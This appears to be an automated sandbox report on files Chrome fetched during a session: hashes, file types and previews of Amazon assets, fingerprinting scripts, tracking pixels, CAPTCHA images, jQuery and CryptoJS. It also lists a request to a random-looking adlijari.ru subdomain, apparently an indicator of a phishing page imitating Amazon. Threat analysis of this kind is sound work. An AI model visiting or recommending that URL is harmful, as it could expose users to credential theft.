                                                                                                                                  SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://www.amazon.com/favicon.ico
                                                                                                                                  Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1829), with no line terminators
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):1829
                                                                                                                                  Entropy (8bit):5.11428892886709
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2G0NUXfVTVKj2HC+gzpYqkQmSMXmng2ayMNrKZCuEJg2zERjDRmgcGAhwZTjMcrA:i2tFov/g542G1mMA4ZIGbFiC4ZbD
                                                                                                                                  MD5:6D68177FA6061598E9509DC4B5BDD08D
                                                                                                                                  SHA1:3BE11C9CF7D3FD0EC940798C3AF6718E7DB15E79
                                                                                                                                  SHA-256:0A7E3153F44D0E51C73DAD9FA3034A14446BEDBAFC38E477915382DD02269123
                                                                                                                                  SHA-512:451FD3B4DA3665B51E74514D69A96B0B27364A3245990B85C136D42CA35C983CB94C4BEA9B1DDB35D1E430D91CB5C8D80DC30FC7308882FF9C31653016A974B6
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.js
                                                                                                                                  Preview:(function(a,k,g,h){var c={},b,n=k.plugins,e=k.mimeTypes,m=k.userAgent,f=Function.prototype,j=function(o){return typeof o!=="undefined"},d=function(){var o="Error",p=Error.toString();return !!(f.bind&&f.bind.toString().replace(/bind/g,o)===p&&f.toString.toString().replace(/toString/g,o)===p)},l=function(){try{if(new ActiveXObject("ShockwaveFlash.ShockwaveFlash")){return true}}catch(p){}var o="application/x-shockwave-flash";return !!(e&&e[o]&&e[o].enabledPlugin)},i=function(r,q){var o;try{o=q.apply(this,arguments)|0}catch(p){o=-1}if(!c.hasOwnProperty(r)){c[r]=o}};i("ael",function(){return j(h.addEventListener)});i("atob",function(){return j(g.atob)});i("cjs",function(){return j(g.emit)});i("crm",function(){return j(g.domAutomation)||j(g.domAutomationController)});i("dcm",function(){return j(h.compatMode)});i("fls",function(){return l()});i("fpr",function(){return d()});i("h5",function(){return j(h.createElement("canvas").getContext)});i("jv",function(){return j(k.javaEnabled)&&k.javaEnab
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):48316
                                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):5153
                                                                                                                                  Entropy (8bit):7.911173143731124
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:5ovnVox4djLmJxB/fIYqDMRw6+yxRSU5ddS8mV7SwioXNfkkiSpB7B3L:5oPh5LmJPWDMmAnS+dSFV+wv9Mv0xL
                                                                                                                                  MD5:CB4B3345E37D374657A36AA03A066C54
                                                                                                                                  SHA1:8B0762DE457702C6A003C546FE3D1CB373DB97D5
                                                                                                                                  SHA-256:A509B4771D67A1030B07C7323F7F38926B599446B336CEBFDC9BE20C4C2E96EB
                                                                                                                                  SHA-512:17C7E706E05E7FBDB3043CE52972B1B8767BD4E5C06655FA60633352C3D18EAA255C2B9D79296679D3D59CFCF3ECCBE1B6581AF5D2FCA2681087A48B903953D5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/captcha/fmvtfjch/Captcha_pslxfojrtx.jpg
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F.........................................(...................................."!........?....s....r..c%....p.y%#..^.....r...O.............C:..]..{a.+..:.2.R.O.1W..\.@=6.......?..h........x.....A.._vC..........S..v..P.......c...X....8N..Q.4.~va.W.e.m.]...i.Ki.^;....7.Z.;..L.n;...Z..RP7....]0....7Q....X...... ....\..c..]:...j.Qr..n..u..{P.........$.aI#.....W..Y.R....r./<........?-.q.....Ej.7..?@...V...Tm.v*.>-[`..S......lv..$d.[om..].._r..;[.{._.Jam...Yb.N...2...p.vR.<.R...> ..N0..S+m...9...3...[i+q.P....^ZZe..Y...)-..|.kRP.eY.3..e.+.....7.].WI.Ai..T.i..1.u.j.h..V......1...lq.~..N..8......".{..u~./.{......6.....)...S.{.@..4?.'.|7.*Z..)#..{.t.jl...z..... \a.&Bv.k.W.j4.B~....&..#$#P...3.a..J0.`.30.../u..-.[kJ......tt.....[..\..mW......0....Hfk\O.h.T.....nY.p...;<M.Y...6.V..'L..;,....YAQv....0.,...6f6NL..)...@0..2.k.u.../........y%.4.O.W..}.".WY
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru/bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO
                                                                                                                                  Preview:1
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:1
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4828
                                                                                                                                  Entropy (8bit):7.894092295640753
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:HcOe0gFaRt2i9S4QlZkGlg4mlNb5+fEd+Q14IK7ADqXTQ6fbU:DhJAi9xQlni1Nb5dg9c6fbU
                                                                                                                                  MD5:936B2A648A204AE14058BCFD53F0DEC4
                                                                                                                                  SHA1:D885DBAA8C8484CC7CF19295BC09DC15FC3D382C
                                                                                                                                  SHA-256:E0BC991364BCB6F6D3EF84D43F8D1B8A78B90D6C6A371301120EA19C065D1358
                                                                                                                                  SHA-512:070711450B4AF0AC19ED9EF8C3C981DBEFDF456B9CE5E9E13769A08D962444BEF9B2E293819141C51ED2AE94DE662505A10E78022C41AAB130557FF83A810FBE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F........................................*.................................!.."..#........?...8.a}#...(ke.BmZN.R/....`..d...@..%1_.c..A..NF,.....$.(uyJ....k....9..8...@eW.c.Z6...].r.m+.L..N..O.ai.V.S.e+Z..!hZ.........:.._pv..q;3.m5=;`...........-#+g1K>.o..b. ._%...~B.S.J)c.8..v.Z....[..u.#[..rv^>%..^...,..IF...M..\}xJ...g.....8..n.R[.H....d.S..Np.E..7*T.U.%A'.'..1.....cdk.T*F...Q.. )b...,<!E...9Y .R.d.Y..c.F]Jp.}tm.../..../Mwf..[.%D.F..L.3.....?...~.....X..>U......IJ.=r..|..!$..2z.#....q.....*.{h3.~......CI.......Yy..y...i..=m..[._Zn#.ov..\....C.l01.W.....b..5:.4l.4..,}jBB).'.i#)9Q[..8.C.....c.^f....y.;Ci.q.E../_2ZCq_..L.b..&.....yA......g.i.....W.f.Y...6NHz..D..3F.%1 .<x...-".T..e t.y.g..S...r...@..GwO.....:63..YbJclE@.FYt+.../N...a.#...$.y..p-l..03.o...FW.3.......1.?.7...E..#$..f..0..h....Y...y.R.>.p.H.<.[u...GQ{-.o.^r.g....[.zj-1O..j-..-.-.K[n...36W.....
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):89501
                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1829), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1829
                                                                                                                                  Entropy (8bit):5.11428892886709
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2G0NUXfVTVKj2HC+gzpYqkQmSMXmng2ayMNrKZCuEJg2zERjDRmgcGAhwZTjMcrA:i2tFov/g542G1mMA4ZIGbFiC4ZbD
                                                                                                                                  MD5:6D68177FA6061598E9509DC4B5BDD08D
                                                                                                                                  SHA1:3BE11C9CF7D3FD0EC940798C3AF6718E7DB15E79
                                                                                                                                  SHA-256:0A7E3153F44D0E51C73DAD9FA3034A14446BEDBAFC38E477915382DD02269123
                                                                                                                                  SHA-512:451FD3B4DA3665B51E74514D69A96B0B27364A3245990B85C136D42CA35C983CB94C4BEA9B1DDB35D1E430D91CB5C8D80DC30FC7308882FF9C31653016A974B6
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:(function(a,k,g,h){var c={},b,n=k.plugins,e=k.mimeTypes,m=k.userAgent,f=Function.prototype,j=function(o){return typeof o!=="undefined"},d=function(){var o="Error",p=Error.toString();return !!(f.bind&&f.bind.toString().replace(/bind/g,o)===p&&f.toString.toString().replace(/toString/g,o)===p)},l=function(){try{if(new ActiveXObject("ShockwaveFlash.ShockwaveFlash")){return true}}catch(p){}var o="application/x-shockwave-flash";return !!(e&&e[o]&&e[o].enabledPlugin)},i=function(r,q){var o;try{o=q.apply(this,arguments)|0}catch(p){o=-1}if(!c.hasOwnProperty(r)){c[r]=o}};i("ael",function(){return j(h.addEventListener)});i("atob",function(){return j(g.atob)});i("cjs",function(){return j(g.emit)});i("crm",function(){return j(g.domAutomation)||j(g.domAutomationController)});i("dcm",function(){return j(h.compatMode)});i("fls",function(){return l()});i("fpr",function(){return d()});i("h5",function(){return j(h.createElement("canvas").getContext)});i("jv",function(){return j(k.javaEnabled)&&k.javaEnab
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (522), with overstriking
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):19614
                                                                                                                                  Entropy (8bit):5.470741284974028
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:Tmibpv/V6zelAGEKp4kF2Y2zSbQWjuL43VwLuQEy4X:BN/lfE+FFFVL3V6ExX
                                                                                                                                  MD5:64EE8D01BBFE60D6EFF43818778FB34E
                                                                                                                                  SHA1:51171FBDD28E1A7A61E922E8F0272AF8BC74D37B
                                                                                                                                  SHA-256:877C2C2A2DA0A1A6C0AD0D7AC8071046A1D726E5AB9C63509E3786B8C8EC5042
                                                                                                                                  SHA-512:A653716D49E642E8E98CA70C5ABA0F798C80A584F7953D56DA5116D755E3BD79E3F3D68942118FE3C6C8FA71034CB84214974440D23179078E6DEB16F121D079
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:(function(a,c,p){function l(a){for(var b={},f,c,d=0;d<a.length;d++)c=a[d],f=c.r+c.s+c.m,c.c&&(b[f]||(b[f]=[]),b[f].push(a[d]));return b}function k(a){for(var b=1;b<arguments.length;b++){var f=arguments[b];try{if(f.isSupported)return f.send(a)}catch(c){}}}function j(){for(var a=0;a<w.length;a++)w[a]();u.length&&k(l(u.splice(0,u.length)),F,G,A);D=z=0}function e(b,f,e){e=e||{};0===e.bf&&d.isBF||(b={r:e.r||d.rid,s:e.s||a.ue_sid,m:e.m||a.ue_mid,mkt:e.mkt||a.ue_mkt,sn:e.sn||a.ue_sn,c:f,d:b,t:e.t||d.d(),.cs:e.c&&a.ue_qsl},e.b?k(l([b]),F,A):e.nb?k(l([b]),F,G,A):e.img||I[f]?k(l([b]),A):e.n?(u.push(b),0===B?j():D||(D=c.setTimeout(j,B))):(u.push(b),z||(z=c.setTimeout(j,H))))}function n(a,b,f){E++;E==s?e({m:"Max number of Forester Logs exceeded",f:"forester-client.js",logLevel:"ERROR"},c.ue_err_chan||"jserr"):E<s&&e(a,b,f)}function i(){if(!y){for(var a=0;a<x.length;a++)x[a]();for(a=0;a<w.length;a++)w[a]();k(l(u.splice(0,u.length)),F,A);y=!0}}var g={};(function(){function a(b){return 10>b?"0"+b:b}f
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:PNG image data, 400 x 600, 8-bit colormap, non-interlaced
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):16972
                                                                                                                                  Entropy (8bit):7.952827903299268
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:2SfK0lKf4JBHcB1tVbM/ALTCGFrtxseF6SYwmoZWpvlobqBX79O:1I4JQ1XbQSTCortxjF69JTpv++L8
                                                                                                                                  MD5:7D7A0CFB8EC9EB548C63BFD8F743181C
                                                                                                                                  SHA1:76CAB36D1597E40654951DEC1BE50C289252CAAA
                                                                                                                                  SHA-256:49FF798368F6E4367D03A44AF687D47609CA4608D02B1A099281F88C910CF1AA
                                                                                                                                  SHA-512:F0AC58933AD72EBEDDCFBF22BF6FD07C0846E2CA180918D0A1F5973185C86C093865D670C29987B4505DA5A74F6655EE88ED00286C7ED299307D340660588AAA
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.png
                                                                                                                                  Preview:.PNG........IHDR.......X.....{2@.....sBIT.....O.....PLTE..................E...].UUU09B333#*1...................E....FLS9AJ....................E.....y.fffUUUKR[FLS9AJ..............E..fffKR[333...........E..inu...........................E..dksS[cFLS...................E..fffKR[FLS....................E..fffKR[FLS............................E...y.mszS[cFLS333........E......................E..3..fffKR[FLS333............................E..mszfff[bjUUUKR[FLS..................E...y.dksS[c333........................E.....fff[bjKR[.........................................................\.....p....."...........I.................<........-...[............+...M.....g..j./...>..E..%......y.1..}...........)..yyy3..az..VVmszinu...dksfff`gn.>N[bj.7ES[c<Z.UUUKR[.]..)*.f..!.JGC.R.. !CCC9AJ...09B333...#*1".....y../....tRNS............."""""""""""333333333333333DDDDDDDDDUUUUUUffffffffffffffwwwwwwwwwww.....................................................................................
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):48316
                                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (544)
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):1787
                                                                                                                                  Entropy (8bit):5.434898978881579
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:H4uA1sGcGMrYhTLzDTZUOmIyiuw4JkkMtA96ZCFYvOe:H4PTLzDTZU9keMi6IY2e
                                                                                                                                  MD5:C2EC838FE27F97D3FD0074CE8BCAF9C3
                                                                                                                                  SHA1:87FEACF794F2465E34A198F1243CFEFDC428BC58
                                                                                                                                  SHA-256:35CF72B3F65845C32617EB726119BBDD969738B7D62BB760C4381E82CE37AC4A
                                                                                                                                  SHA-512:55013756F0CD2312A7D9499BF110952EBE93865BB6E3F88F870B86DE4517C6907EA3C45E10F6C220A56A59A06B4FF73E38CE6A0AF5B1F49521FCB75D23BD4976
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
